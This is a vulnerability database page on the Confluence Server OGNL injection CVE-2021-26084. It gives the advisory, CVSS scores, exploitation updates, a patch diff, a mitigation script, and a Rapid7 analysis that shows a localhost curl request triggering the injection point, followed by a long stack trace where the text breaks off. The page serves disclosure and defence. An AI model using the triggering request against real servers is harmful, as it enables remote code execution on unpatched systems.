Attacker Value
Very High
CVE-2021-26084 Confluence Server OGNL injection
CVE-2021-26084 Confluence Server OGNL injection
(Last updated October 04, 2021) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Persistence
Techniques
Validation
Metasploit Module
Description
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Add Assessment
3
Technical Analysis
Please see the Rapid7 analysis. Thank you to Jang (@testanull) for being a great collaborator. :)
2
Technical Analysis
PoC exploit is publicly available https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
0
good
1
Please provide additional information for your rating where possible by adding a comment explaining why you decided to rate this as Medium specifically.
-1
2
Stating its rating (exploitability & attacker value) without providing additional details is not useful to end users. Please provide more details when creating future assessments as I’ve noticed you’ve provided similar one line assessments for at least 2-3 other vulnerabilities as well.
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- Atlassian
Products
- Confluence Server,
- Confluence Data Center
Metasploit Modules
Exploited in the Wild
References
Miscellaneous
Technical Analysis
Threat status: Widespread threat
Attacker utility: Remote code execution
Vulnerability class: Injection
Update October 4, 2021: Sophos is sharing details about a ransomware attack utilizing this vulnerability to provide the attacker’s initial access.
Update September 3, 2021: United States Cyber Command tweeted a warning on September 3, 2021 that mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to increase. Defenders are once again urged to update on an emergency basis if they have not already done so. CISA has also released a ransomware awareness guide for of holidays and weekends.
On August 25, 2021, Atlassian published details on CVE-2021-26084, a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. CVE-2021-26084 carries a CVSSv3 base score of 9.8.
Widespread exploitation of CVE-2021-26084 began September 1, 2021 and is ongoing. Many of the initial attacks have installed coin miners on vulnerable targets; we expect, however, that ransomware operators will begin leveraging this vulnerability quickly. Public proof-of-concept (PoC) code is available as of August 31, 2021. Community researchers have reported opportunistic scanning and exploitation of Confluence honeypots. Confluence Server and Data Center customers should update to a fixed version on an emergency basis.
Affected products
- version < 6.13.23
- 6.14.0 ≤ version < 7.4.11
- 7.5.0 ≤ version < 7.11.5
- 7.12.0 ≤ version < 7.12.5
For more information, see Atlassian’s advisory and its associated customer ticket.
Rapid7 analysis
Only the createpage-entervariables functionality is shown in this section.
Analyzing the patch (and mitigation)
--- a/atlassian-confluence-7.12.4/confluence/pages/createpage-entervariables.vm +++ b/atlassian-confluence-7.12.5/confluence/pages/createpage-entervariables.vm @@ -21,9 +21,9 @@ <form name="filltemplateform" method="POST" action="doenterpagevariables.action"> #form_xsrfToken() - #tag ("Hidden" "name='queryString'" "value='$!queryString'") + #tag ("Hidden" "name='queryString'" "value=queryString") #tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'") - #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'") + #tag ("Hidden" "name='linkCreation'" "value=linkCreation") #tag ("Hidden" "name='title'" "value=title") #tag ("Hidden" "name='parentPageId'" "value=parentPageId") #tag ("Hidden" "name='fromPageId'" "value=fromPageId")
https://www.atlassian.com/software/confluence/download-archives
# ###################################### # File 3 of 5 echo "File 3: 'confluence/pages/createpage-entervariables.vm':" echo -n " a. backing up file.. " cp -np confluence/pages/createpage-entervariables.vm confluence/pages/createpage-entervariables.vm.original; echo "done" echo -n " b. updating file.. " sed $SEDFLAGS 's/("Hidden" "name=.([a-zA-Z]+)." "value=).\$[!l][^"]+"/\1\2"/' confluence/pages/createpage-entervariables.vm; echo "done" echo " c. showing file changes.." diff confluence/pages/createpage-entervariables.vm.original confluence/pages/createpage-entervariables.vm echo -n " d. validating file changes.." if grep -qi "value='\$!querystring" confluence/pages/createpage-entervariables.vm then echo "ERROR: Failed to update confluence/pages/createpage-entervariables.vm" echo "" echo "UPDATE FAILED, EXITING!" exit 1; fi if grep -qi "value='\$linkCreation" confluence/pages/createpage-entervariables.vm then echo "ERROR: Failed to update confluence/pages/createpage-entervariables.vm" echo "" echo "UPDATE FAILED, EXITING!" exit 1; fi if ! grep -qi "value=linkCreation" confluence/pages/createpage-entervariables.vm then echo "ERROR: Failed to update confluence/pages/createpage-entervariables.vm" echo "" echo "UPDATE FAILED, EXITING!" exit 1; fi echo "ok" echo " e. file updated successfully!" echo ""
Triggering the vulnerability
wvu@kharak:~$ curl -vs http://127.0.0.1:8090/pages/createpage-entervariables.action --data-urlencode queryString=\\ | rg -w queryString * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8090 (#0) > POST /pages/createpage-entervariables.action HTTP/1.1 > Host: 127.0.0.1:8090 > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 15 > Content-Type: application/x-www-form-urlencoded > } [15 bytes data] * upload completely sent off: 15 out of 15 bytes < HTTP/1.1 200 < Cache-Control: no-store < Expires: Thu, 01 Jan 1970 00:00:00 GMT < X-Confluence-Request-Time: 1630525237367 < Set-Cookie: JSESSIONID=A9732823F10BFD4DE050EAF04F9C65E5; Path=/; HttpOnly < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < X-Frame-Options: SAMEORIGIN < Content-Security-Policy: frame-ancestors 'self' < X-Accel-Buffering: no < Content-Type: text/html;charset=UTF-8 < Transfer-Encoding: chunked < Date: Wed, 01 Sep 2021 19:40:43 GMT < { [7722 bytes data] name="queryString" /> * Connection #0 to host 127.0.0.1 left intact * Closing connection 0 wvu@kharak:~$
2021-09-01 19:40:38,284 DEBUG [http-nio-8090-exec-7] [util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString] 2021-09-01 19:40:38,285 DEBUG [http-nio-8090-exec-7] [opensymphony.webwork.util.SafeExpressionUtil] isSafeExpression Cannot verify safety of OGNL expression -- url: /pages/createpage-entervariables.action | traceId: 43095863fd6d9dc6 | userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\' [ognl.TokenMgrError: Lexical error at line 1, column 4. Encountered: <EOF> after : ""] at ognl.Ognl.parseExpression(Ognl.java:119) at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196) at com.opensymphony.webwork.util.SafeExpressionUtil.isSafeExpression(SafeExpressionUtil.java:69) at com.opensymphony.webwork.util.OgnlValueFinder$Factory$1.findValue(OgnlValueFinder.java:29) at com.opensymphony.webwork.views.jsp.WebWorkTagSupport.findValue(WebWorkTagSupport.java:74) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.evaluateParams(AbstractUITag.java:378) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.doEndTag(AbstractUITag.java:213) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.processTag(AbstractTagDirective.java:349) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.render(AbstractTagDirective.java:122) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72) at org.apache.velocity.runtime.parser.node.ASTIfStatement.render(ASTIfStatement.java:87) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.Template.merge(Template.java:328) at org.apache.velocity.Template.merge(Template.java:235) at com.opensymphony.webwork.views.jsp.ui.template.VelocityTemplateEngine.renderTemplate(VelocityTemplateEngine.java:52) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.mergeTemplate(AbstractUITag.java:427) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.doEndTag(AbstractUITag.java:216) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.processTag(AbstractTagDirective.java:349) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.render(AbstractTagDirective.java:122) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.runtime.directive.Parse.render(Parse.java:263) at com.atlassian.confluence.setup.velocity.ProfilingParseDirective.render(ProfilingParseDirective.java:21) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72) at com.atlassian.confluence.setup.velocity.ApplyDecoratorDirective.getRenderedTagBody(ApplyDecoratorDirective.java:180) at com.atlassian.confluence.setup.velocity.ApplyDecoratorDirective.render(ApplyDecoratorDirective.java:155) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.Template.merge(Template.java:328) at org.apache.velocity.Template.merge(Template.java:235) at com.opensymphony.webwork.dispatcher.VelocityResult.doExecute(VelocityResult.java:91) at com.atlassian.xwork.results.ProfiledVelocityResult.doExecute(ProfiledVelocityResult.java:18) at com.atlassian.confluence.setup.webwork.EncodingVelocityResult.doExecute(EncodingVelocityResult.java:43) at com.opensymphony.webwork.dispatcher.WebWorkResultSupport.execute(WebWorkResultSupport.java:116) at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.XsrfTokenInterceptor.intercept(XsrfTokenInterceptor.java:120) at com.atlassian.confluence.xwork.ConfluenceXsrfTokenInterceptor.intercept(ConfluenceXsrfTokenInterceptor.java:30) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceLicenseInterceptor.intercept(ConfluenceLicenseInterceptor.java:65) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.validation.MessageHolderInterceptor.intercept(MessageHolderInterceptor.java:37) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.util.LoggingContextInterceptor.intercept(LoggingContextInterceptor.java:44) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.CancellingInterceptor.intercept(CancellingInterceptor.java:21) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.RestrictHttpMethodInterceptor.intercept(RestrictHttpMethodInterceptor.java:119) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.websudo.WebSudoInterceptor.intercept(WebSudoInterceptor.java:57) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.themes.ThemeContextInterceptor.intercept(ThemeContextInterceptor.java:42) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.actions.PermissionCheckInterceptor.intercept(PermissionCheckInterceptor.java:97) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.setup.webwork.BootstrapAwareInterceptor.intercept(BootstrapAwareInterceptor.java:19) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.user.actions.UserAwareInterceptor.intercept(UserAwareInterceptor.java:50) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.CommentAwareInterceptor.intercept(CommentAwareInterceptor.java:37) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.PageAwareInterceptor.intercept(PageAwareInterceptor.java:43) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.spaces.actions.SpaceAwareInterceptor.intercept(SpaceAwareInterceptor.java:70) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.ConfluenceAccessInterceptor.intercept(ConfluenceAccessInterceptor.java:31) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61) at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51) at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115) at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56) at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199) at javax.servlet.http.HttpServlet.service(HttpServlet.java:733) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.DebugFilter.doFilter(DebugFilter.java:46) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.baseurl.IncludeResourcesFilter.doFilter(IncludeResourcesFilter.java:52) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.labs.botkiller.BotKillerFilter.doFilter(BotKillerFilter.java:36) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.pulp.PulpFilter.doFilter(PulpFilter.java:70) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.analytics.client.filter.UniversalAnalyticsFilter.doFilter(UniversalAnalyticsFilter.java:75) at com.atlassian.analytics.client.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:48) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.mywork.client.filter.ServingRequestsFilter.doFilter(ServingRequestsFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.efi.OnboardingFilter.doFilter(OnboardingFilter.java:77) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsSiteMeshFixupFilter.doFilter(PrettyUrlsSiteMeshFixupFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsDispatcherFilter.doFilter(PrettyUrlsDispatcherFilter.java:55) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsSiteMeshFilter.doFilter(PrettyUrlsSiteMeshFilter.java:80) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsMatcherFilter.doFilter(PrettyUrlsMatcherFilter.java:51) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.mobile.filter.MobileAppWebViewFilter.doFilter(MobileAppWebViewFilter.java:58) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.message.MessagesDecoratorFilter.doFilter(MessagesDecoratorFilter.java:65) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.opensymphony.sitemesh.webapp.SiteMeshFilter.obtainContent(SiteMeshFilter.java:129) at com.opensymphony.sitemesh.webapp.SiteMeshFilter.doFilter(SiteMeshFilter.java:77) at com.atlassian.confluence.util.profiling.ProfilingSiteMeshFilter.doFilter(ProfilingSiteMeshFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.troubleshooting.thready.filter.AbstractThreadNamingFilter.doFilter(AbstractThreadNamingFilter.java:46) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.util.profiling.ConfluenceActivityFilter.doFilter(ConfluenceActivityFilter.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.jmx.JmxFilter.doFilter(JmxFilter.java:97) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.cache.TransactionalCacheFactoryCleanupFilter.doFilter(TransactionalCacheFactoryCleanupFilter.java:22) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.ServletContextThreadLocalFilter.doFilter(ServletContextThreadLocalFilter.java:17) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserLoggingContextFilter.doFilter(UserLoggingContextFilter.java:32) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserNameHeaderFilter.doFilter(UserNameHeaderFilter.java:25) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.MauEventFilter.doFilterInternal(MauEventFilter.java:31) at com.atlassian.confluence.web.filter.AbstractStaticResourceAwareFilter.doFilter(AbstractStaticResourceAwareFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserThreadLocalFilter.doFilter(UserThreadLocalFilter.java:38) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ConfluenceTimeoutFilter.doFilter(ConfluenceTimeoutFilter.java:57) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at 